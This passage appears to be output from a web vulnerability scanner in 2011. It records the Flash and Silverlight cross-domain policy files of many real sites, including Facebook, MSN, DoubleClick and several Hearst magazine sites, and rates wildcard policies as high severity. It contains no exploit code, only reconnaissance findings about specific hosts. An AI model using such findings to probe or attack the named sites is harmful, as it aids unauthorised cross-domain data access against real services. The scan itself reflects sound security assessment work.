HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"695-1261547040000" Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT Content-Type: application/xml Content-Length: 695 Date: Sat, 17 Sep 2011 16:46:09 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.myspace.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ksolo.myspace.com" secure="true" /> ...[SNIP]... <allow-access-from domain="myspace.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.myspace.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.myspacecdn.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://rd.meebo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rd.meebo.com |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 17 Sep 2011 16:35:05 GMT Content-Type: text/xml; charset=utf8 Content-Length: 91 Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="*.meebo.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://syndication.mmismm |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: syndication.mmismm.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:36:27 GMT Server: Apache Last-Modified: Mon, 25 Jul 2011 02:24:28 GMT ETag: "10e-4a8db83b7af00" Accept-Ranges: bytes Content-Length: 270 Keep-Alive: timeout=300 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.adap.tv"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://vid.catalog |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: vid.catalog.newsinc.com |
HTTP/1.1 200 OK x-amz-id-2: kINuD0Bcyu12dQbGqQyN x-amz-request-id: 9059D255E24D2AD3 Date: Sat, 17 Sep 2011 16:23:23 GMT x-amz-meta-cb-modifi Last-Modified: Fri, 25 Mar 2011 17:04:14 GMT ETag: "337fabcd64c64b24463 Accept-Ranges: bytes Content-Type: text/xml Content-Length: 577 Connection: keep-alive Server: AmazonS3 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.newsinc.com"/> <allow-access-from domain="*.ap.org"/> <allow-access-from domain="*.amazonaws.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.adadvisor.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.adadvisor.net |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:45:19 GMT Server: Apache Last-Modified: Tue, 17 May 2011 11:32:15 GMT ETag: "1de-4a3771fb8e953" Accept-Ranges: bytes Content-Length: 478 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.tubemogul.com" /> ...[SNIP]... <allow-access-from domain="*.adap.tv" /> ...[SNIP]... <allow-access-from domain="*.videoegg.com" /> ...[SNIP]... <allow-access-from domain="*.tidaltv.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.adbrite.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.adbrite.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: application/xml Date: Sat, 17 Sep 2011 16:44:23 GMT ETag: "1c437e-17f-495aa38d05940 Last-Modified: Mon, 22 Nov 2010 20:37:17 GMT Server: Apache Content-Length: 383 Connection: close <?xml version="1.0"?> <!-- AdBrite crossdomain.xml for BritePic and BriteFlic --> <cross-domain-policy> <allow-access-from domain="*.adbrite.com" secure="true" /> <allow-access-from domain="www. ...[SNIP]... <allow-access-from domain="*.britepic.com" secure="true" /> ...[SNIP]... <allow-access-from domain="www.britepic.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.delish.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.delish.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 1198 Content-Type: application/xml Cache-Control: max-age=569 Date: Sat, 17 Sep 2011 16:27:44 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="*.syrupnyc.org"/> <allow-access-from domain="*.esquire.com"/> <allow-access-from domain="*.cosmogirl.com"/> <allow-access-from domain="*.cosmopolitan.com"/> <allow-access-from domain="*.countryliving.com"/> <allow-access-from domain="*.goodhousekeeping.com"/> <allow-access-from domain="*.harpersbazaar.com"/> <allow-access-from domain="*.housebeautiful.com"/> <allow-access-from domain="*.marieclaire.com"/> <allow-access-from domain="*.misquincemag.com"/> <allow-access-from domain="*.quickandsimple.com"/> <allow-access-from domain="*.redbookmag.com"/> <allow-access-from domain="*.seventeen.com"/> <allow-access-from domain="*.teenmag.com"/> <allow-access-from domain="*.thedailygreen.com"/> <allow-access-from domain="*.veranda.com"/> <allow-access-from domain="*.townandcountrymag.com"/> <allow-access-from domain="*.townandcountrytravelmag <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.hearstmags.com"/> <allow-access-from domain="*.realage.com"/> <allow-access-from domain="*.realbeauty.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: Connection: close Content-Length: 1527 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> ...[SNIP]... <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> <allow-access-from domain="static.ak.fbcdn.net" /> <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> <allow-access-from domain="www.beta.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fetchback.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fetchback.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:32:10 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT Accept-Ranges: bytes Content-Length: 328 Cache-Control: max-age=0 Expires: Sat, 17 Sep 2011 17:32:10 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <!-- Begin FetchBack Cross Domain Policy Entry --> <allow-access-from domain="*.fetchback.com" to-ports="80" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gather.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:28:44 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Last-Modified: Wed, 03 Mar 2010 20:18:05 GMT ETag: "14fb57-163-480eb2e0b3940 Accept-Ranges: bytes Content-Length: 355 Keep-Alive: timeout=5, max=100 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.quantserve.com"/> <allow-access-from domain="*.gather.com"/> <allow-access-from domain="*.aetna.com"/> <allow-access-from domain="*.intelihealth.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.local.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.local.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sat, 17 Sep 2011 16:28:14 GMT ETag: "fc48dcbbf6dcc1:0" Last-Modified: Thu, 08 Sep 2011 00:34:19 GMT Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 598 Connection: close <?xml version="1.0" ?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.local.com"/> <allow-access-from domain="*.local.net"/> <allow-access-from domain="*.qa.local.net"/> <allow-access-from domain="*.local.gov"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.meebo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.meebo.com |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 17 Sep 2011 16:34:48 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 303 Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="www.meebo.com"/> <allow-access-from domain="*.meebo.com"/> <allow-access-from domain="meebo.com"/> <allow-access-from domain="*.meebome.com"/> <allow-access-from domain="www.meebome.com"/> <allow-access-from domain="meebome.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.misquincemag |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.misquincemag.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 2016 Content-Type: application/xml Cache-Control: max-age=600 Date: Sat, 17 Sep 2011 16:33:16 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.syrupnyc.org"/> <allow-access-from domain="*.esquire.com"/> <allow-access-from domain="*.cosmogirl.com"/> <allow-access-from domain="*.cosmopolitan.com"/> <allow-access-from domain="*.countryliving.com"/> <allow-access-from domain="*.goodhousekeeping.com"/> <allow-access-from domain="*.harpersbazaar.com"/> <allow-access-from domain="*.housebeautiful.com"/> <allow-access-from domain="*.marieclaire.com"/> <allow-access-from domain="*.misquincemag.com"/> <allow-access-from domain="*.popularmechanics.com"/> <allow-access-from domain="*.quickandsimple.com"/> <allow-access-from domain="*.redbookmag.com"/> <allow-access-from domain="*.seventeen.com"/> <allow-access-from domain="*.teenmag.com"/> <allow-access-from domain="*.thedailygreen.com"/> <allow-access-from domain="*.veranda.com"/> <allow-access-from domain="*.townandcountrymag.com"/> <allow-access-from domain="*.townandcountrytravelmag <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.hearstmags.com"/> <allow-access-from domain="*.realage.com"/> <allow-access-from domain="*.realbeauty.com"/> <allow-access-from domain="*.mstudio.com"/> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.thesurvivorsclub.org" secure="false" /> ...[SNIP]... <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.harpersbazaar.co.uk"/> <allow-access-from domain="*.company.co.uk"/> <allow-access-from domain="*.youandyourwedding.co.uk"/> <allow-access-from domain="*.menshealth.co.uk"/> <allow-access-from domain="*.babyexpert.com"/> <allow-access-from domain="*.handbag.com"/> <allow-access-from domain="*.cosmopolitan.co.uk"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.quickandsimple |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.quickandsimple.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 2016 Content-Type: application/xml Cache-Control: max-age=600 Date: Sat, 17 Sep 2011 16:33:29 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.syrupnyc.org"/> <allow-access-from domain="*.esquire.com"/> <allow-access-from domain="*.cosmogirl.com"/> <allow-access-from domain="*.cosmopolitan.com"/> <allow-access-from domain="*.countryliving.com"/> <allow-access-from domain="*.goodhousekeeping.com"/> <allow-access-from domain="*.harpersbazaar.com"/> <allow-access-from domain="*.housebeautiful.com"/> <allow-access-from domain="*.marieclaire.com"/> <allow-access-from domain="*.misquincemag.com"/> <allow-access-from domain="*.popularmechanics.com"/> <allow-access-from domain="*.quickandsimple.com"/> <allow-access-from domain="*.redbookmag.com"/> <allow-access-from domain="*.seventeen.com"/> <allow-access-from domain="*.teenmag.com"/> <allow-access-from domain="*.thedailygreen.com"/> <allow-access-from domain="*.veranda.com"/> <allow-access-from domain="*.townandcountrymag.com"/> <allow-access-from domain="*.townandcountrytravelmag <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.hearstmags.com"/> <allow-access-from domain="*.realage.com"/> <allow-access-from domain="*.realbeauty.com"/> <allow-access-from domain="*.mstudio.com"/> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.thesurvivorsclub.org" secure="false" /> ...[SNIP]... <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.harpersbazaar.co.uk"/> <allow-access-from domain="*.company.co.uk"/> <allow-access-from domain="*.youandyourwedding.co.uk"/> <allow-access-from domain="*.menshealth.co.uk"/> <allow-access-from domain="*.babyexpert.com"/> <allow-access-from domain="*.handbag.com"/> <allow-access-from domain="*.cosmopolitan.co.uk"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.realage.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.realage.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 2016 Content-Type: application/xml P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: max-age=14 Date: Sat, 17 Sep 2011 16:30:09 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.syrupnyc.org"/> <allow-access-from domain="*.esquire.com"/> <allow-access-from domain="*.cosmogirl.com"/> <allow-access-from domain="*.cosmopolitan.com"/> <allow-access-from domain="*.countryliving.com"/> <allow-access-from domain="*.goodhousekeeping.com"/> <allow-access-from domain="*.harpersbazaar.com"/> <allow-access-from domain="*.housebeautiful.com"/> <allow-access-from domain="*.marieclaire.com"/> <allow-access-from domain="*.misquincemag.com"/> <allow-access-from domain="*.popularmechanics.com"/> <allow-access-from domain="*.quickandsimple.com"/> <allow-access-from domain="*.redbookmag.com"/> <allow-access-from domain="*.seventeen.com"/> <allow-access-from domain="*.teenmag.com"/> <allow-access-from domain="*.thedailygreen.com"/> <allow-access-from domain="*.veranda.com"/> <allow-access-from domain="*.townandcountrymag.com"/> <allow-access-from domain="*.townandcountrytravelmag <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.hearstmags.com"/> <allow-access-from domain="*.realage.com"/> <allow-access-from domain="*.realbeauty.com"/> <allow-access-from domain="*.mstudio.com"/> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.thesurvivorsclub.org" secure="false" /> ...[SNIP]... <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.harpersbazaar.co.uk"/> <allow-access-from domain="*.company.co.uk"/> <allow-access-from domain="*.youandyourwedding.co.uk"/> <allow-access-from domain="*.menshealth.co.uk"/> <allow-access-from domain="*.babyexpert.com"/> <allow-access-from domain="*.handbag.com"/> <allow-access-from domain="*.cosmopolitan.co.uk"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.seventeen.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.seventeen.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 2016 Content-Type: application/xml Cache-Control: max-age=272 Date: Sat, 17 Sep 2011 16:34:01 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.syrupnyc.org"/> <allow-access-from domain="*.esquire.com"/> <allow-access-from domain="*.cosmogirl.com"/> <allow-access-from domain="*.cosmopolitan.com"/> <allow-access-from domain="*.countryliving.com"/> <allow-access-from domain="*.goodhousekeeping.com"/> <allow-access-from domain="*.harpersbazaar.com"/> <allow-access-from domain="*.housebeautiful.com"/> <allow-access-from domain="*.marieclaire.com"/> <allow-access-from domain="*.misquincemag.com"/> <allow-access-from domain="*.popularmechanics.com"/> <allow-access-from domain="*.quickandsimple.com"/> <allow-access-from domain="*.redbookmag.com"/> <allow-access-from domain="*.seventeen.com"/> <allow-access-from domain="*.teenmag.com"/> <allow-access-from domain="*.thedailygreen.com"/> <allow-access-from domain="*.veranda.com"/> <allow-access-from domain="*.townandcountrymag.com"/> <allow-access-from domain="*.townandcountrytravelmag <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.hearstmags.com"/> <allow-access-from domain="*.realage.com"/> <allow-access-from domain="*.realbeauty.com"/> <allow-access-from domain="*.mstudio.com"/> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.thesurvivorsclub.org" secure="false" /> ...[SNIP]... <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.harpersbazaar.co.uk"/> <allow-access-from domain="*.company.co.uk"/> <allow-access-from domain="*.youandyourwedding.co.uk"/> <allow-access-from domain="*.menshealth.co.uk"/> <allow-access-from domain="*.babyexpert.com"/> <allow-access-from domain="*.handbag.com"/> <allow-access-from domain="*.cosmopolitan.co.uk"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.thedailygreen |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.thedailygreen.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 2016 Content-Type: application/xml Cache-Control: max-age=600 Date: Sat, 17 Sep 2011 16:26:50 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.syrupnyc.org"/> <allow-access-from domain="*.esquire.com"/> <allow-access-from domain="*.cosmogirl.com"/> <allow-access-from domain="*.cosmopolitan.com"/> <allow-access-from domain="*.countryliving.com"/> <allow-access-from domain="*.goodhousekeeping.com"/> <allow-access-from domain="*.harpersbazaar.com"/> <allow-access-from domain="*.housebeautiful.com"/> <allow-access-from domain="*.marieclaire.com"/> <allow-access-from domain="*.misquincemag.com"/> <allow-access-from domain="*.popularmechanics.com"/> <allow-access-from domain="*.quickandsimple.com"/> <allow-access-from domain="*.redbookmag.com"/> <allow-access-from domain="*.seventeen.com"/> <allow-access-from domain="*.teenmag.com"/> <allow-access-from domain="*.thedailygreen.com"/> <allow-access-from domain="*.veranda.com"/> <allow-access-from domain="*.townandcountrymag.com"/> <allow-access-from domain="*.townandcountrytravelmag <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.hearstmags.com"/> <allow-access-from domain="*.realage.com"/> <allow-access-from domain="*.realbeauty.com"/> <allow-access-from domain="*.mstudio.com"/> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.thesurvivorsclub.org" secure="false" /> ...[SNIP]... <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.harpersbazaar.co.uk"/> <allow-access-from domain="*.company.co.uk"/> <allow-access-from domain="*.youandyourwedding.co.uk"/> <allow-access-from domain="*.menshealth.co.uk"/> <allow-access-from domain="*.babyexpert.com"/> <allow-access-from domain="*.handbag.com"/> <allow-access-from domain="*.cosmopolitan.co.uk"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ugo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ugo.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:28:01 GMT Server: Apache Set-Cookie: cgi-session-id=02E0B838 Set-Cookie: cgi-session-id=02E0B838 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.ugo.com" /> <allow-access-from domain="ugo.com" /> <allow-access-from domain="flashxml.ugo.com" /> <allow-access-from domain="*.ugo.com" /> <allow-access-from domain="*.ugo.dev" /> <allow-access-from domain="e3.ugo.com" /> <allow-access-from domain="e3.net" /> <allow-access-from domain="*.ign.com" /> <allow-access-from domain="*.askmen.com" /> <allow-access-from domain="*.1up.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.youtube |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.youtube-nocookie.com |
HTTP/1.0 200 OK Date: Sat, 17 Sep 2011 16:44:57 GMT Server: Apache Last-Modified: Thu, 15 Sep 2011 00:40:20 GMT ETag: "132-4acf01f0e4500" Accept-Ranges: bytes Content-Length: 306 Content-Type: application/xml <?xml version="1.0"?> <!-- http://www.youtube.com <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="s.ytimg.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://1663.ic-live.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 1663.ic-live.com |
HTTP/1.0 200 OK Date: Sat, 17 Sep 2011 16:37:27 GMT Server: Apache Last-Modified: Thu, 11 Aug 2011 17:51:35 GMT ETag: "6b8443-1c8-4aa3e72a5b7c0 Accept-Ranges: bytes Content-Length: 456 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml" Content-Type: text/xml X-Cache: MISS from i2a-coll-3 X-Cache-Lookup: MISS from i2a-coll-3:80 Via: 1.0 i2a-coll-3:80 (squid/2.6.STABLE21) Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="ecdev1.avery.com" secure="false" /> ...[SNIP]... <allow-access-from domain="ecdev1.averysignatur ...[SNIP]... <allow-access-from domain="www.averysignaturebinders ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://api.twitter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.twitter.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:34:11 GMT Server: hi Status: 200 OK Last-Modified: Wed, 14 Sep 2011 18:32:19 GMT Content-Type: application/xml Content-Length: 561 Cache-Control: max-age=1800 Expires: Sat, 17 Sep 2011 17:04:11 GMT Vary: Accept-Encoding Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="twitter.com" /> ...[SNIP]... <allow-access-from domain="search.twitter.com" /> <allow-access-from domain="static.twitter.com" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://33across.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: 33across.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:44:36 GMT Server: Apache Last-Modified: Tue, 29 Mar 2011 17:37:20 GMT Accept-Ranges: bytes Content-Length: 335 Cache-Control: max-age=1209600, proxy-revalidate Expires: Sat, 01 Oct 2011 16:44:36 GMT Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> </allow-from> <gr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.rad.msn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: a.rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT Accept-Ranges: bytes ETag: "0c969ab9748cc1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Sat, 17 Sep 2011 16:27:58 GMT Connection: keep-alive Content-Length: 337 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 20:54:04 GMT Date: Sat, 17 Sep 2011 16:23:42 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adunit.cdn |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: adunit.cdn.auditude.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=604800 Content-Type: text/xml Date: Sat, 17 Sep 2011 16:23:16 GMT ETag: "1210291592" Expires: Sat, 24 Sep 2011 16:23:16 GMT Last-Modified: Tue, 23 Aug 2011 20:50:56 GMT Server: ECS (sjo/522D) X-Cache: HIT Content-Length: 349 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= "*"> <domain uri="*"/> </allow-from> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.rad.msn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT Accept-Ranges: bytes ETag: "0c969ab9748cc1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Sat, 17 Sep 2011 16:29:19 GMT Connection: keep-alive Content-Length: 337 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT Content-Type: application/xml Expires: Sun, 18 Sep 2011 16:23:09 GMT Date: Sat, 17 Sep 2011 16:23:09 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c.delish.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: c.delish.com |
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT Accept-Ranges: bytes ETag: "0ac2dec217dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 17 Sep 2011 16:21:11 GMT Connection: keep-alive Content-Length: 340 ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <g ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c.msn.com |
Path: | /clientaccesspolicy.xml |
